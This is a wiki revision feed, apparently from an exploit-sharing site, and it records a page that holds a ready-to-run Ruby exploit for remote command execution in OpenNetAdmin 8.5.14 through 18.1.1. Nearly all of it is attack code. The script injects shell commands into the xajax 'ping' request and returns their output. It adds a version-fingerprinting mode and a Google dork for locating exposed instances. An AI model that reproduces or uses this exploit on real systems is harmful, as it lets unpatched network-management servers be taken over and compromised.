https://pwnwiki.com/index.php?action=history&feed=atom&title=OpenNetAdmin_versions_8.5.14_through_18.1.1_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
OpenNetAdmin versions 8.5.14 through 18.1.1 遠程命令執行漏洞 - Revision history
2026-04-26T09:43:20Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=OpenNetAdmin_versions_8.5.14_through_18.1.1_%E9%81%A0%E7%A8%8B%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=3613&oldid=prev
Pwnwiki: Created page with "==EXP== <pre> #!/usr/bin/env ruby # Exploit ## Title: OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution ## Google Dorks: ## inurl:/ona/ ## Author: noraj (Alexandre Z..."
2021-05-30T02:14:21Z
<p>Created page with "==EXP== <pre> #!/usr/bin/env ruby # Exploit ## Title: OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution ## Google Dorks: ## inurl:/ona/ ## Author: noraj (Alexandre Z..."</p>
<p><b>New page</b></p><div>==EXP==<br />
<pre><br />
#!/usr/bin/env ruby<br />
<br />
# Exploit<br />
## Title: OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution<br />
## Google Dorks:<br />
## inurl:/ona/<br />
## Author: noraj (Alexandre ZANNI) for SEC-IT (http://secit.fr)<br />
## Author website: https://pwn.by/noraj/<br />
## Date: 2021-05-07<br />
## Vendor Homepage: https://github.com/opennetadmin/ona<br />
## Software Link: https://github.com/opennetadmin/ona/archive/refs/tags/v18.1.1.tar.gz<br />
## Version: 8.5.14 to 18.1.1<br />
## Tested on: OpenNetAdmin 18.1.1<br />
## Patch: Use git master branch (no new version released)<br />
<br />
# Vulnerabilities<br />
## Discoverer: mattpascoe<br />
## Date: 2019-11-19<br />
## Discoverer website: https://github.com/mattpascoe<br />
## Discovered on OpenNetAdmin 18.1.1<br />
## Vulnerability 1:<br />
## Title: OpenNetAdmin 18.1.1 - Remote Code Execution<br />
## CVE: none<br />
## References: https://www.exploit-db.com/exploits/47691<br />
<br />
require 'httpx'<br />
require 'docopt'<br />
<br />
doc = <<~DOCOPT<br />
OpenNetAdmin 8.5.14 <= 18.1.1 - Remote Command Execution<br />
<br />
Usage:<br />
#{__FILE__} exploit <url> <cmd> [--debug]<br />
#{__FILE__} version <url> [--debug]<br />
#{__FILE__} -h | --help<br />
<br />
exploit: Exploit the RCE vuln<br />
version: Try to fetch OpenNetAdmin version<br />
<br />
Options:<br />
<url> Root URL (base path) including HTTP scheme, port and root folder<br />
<cmd> Command to execute on the target<br />
--debug Display arguments<br />
-h, --help Show this screen<br />
<br />
Examples:<br />
#{__FILE__} exploit http://example.org id<br />
#{__FILE__} exploit https://example.org:5000/ona 'touch hackproof'<br />
#{__FILE__} version https://example.org:5000/ona<br />
DOCOPT<br />
<br />
def exploit(root_url, cmd, separator)<br />
params = {<br />
'xajax' => 'window_submit',<br />
'xajaxargs' => ['tooltips', "ip=>; echo #{separator}; #{cmd} 2>&1; echo #{separator}", 'ping']<br />
}<br />
<br />
res = HTTPX.post(root_url, form: params).body.to_s.match(/#{separator}(.*)#{separator}/m)<br />
<br />
return '[-] Target not vulnerable' if res.captures[0].nil?<br />
<br />
res.captures[0]<br />
end<br />
<br />
def version(root_url)<br />
params = {<br />
'xajax' => 'window_open',<br />
'xajaxargs' => ['app_about']<br />
}<br />
<br />
res = HTTPX.post(root_url, form: params).body.to_s.match(/<u>&copy; \d{4} OpenNetAdmin - v(\S+)<\/u>/)<br />
<br />
return '[-] Version not found' if res.captures[0].nil?<br />
<br />
res.captures[0]<br />
end<br />
<br />
begin<br />
args = Docopt.docopt(doc)<br />
pp args if args['--debug']<br />
<br />
if args['version']<br />
puts version(args['<url>'])<br />
else<br />
SEPARATOR = '556cc23863fef20fab5c456db166bc6e'.freeze<br />
<br />
output = exploit(args['<url>'], args['<cmd>'], SEPARATOR)<br />
puts '[+] Command output:'<br />
puts output<br />
end<br />
rescue Docopt::Exit => e<br />
puts e.message<br />
end<br />
</pre></div>
Pwnwiki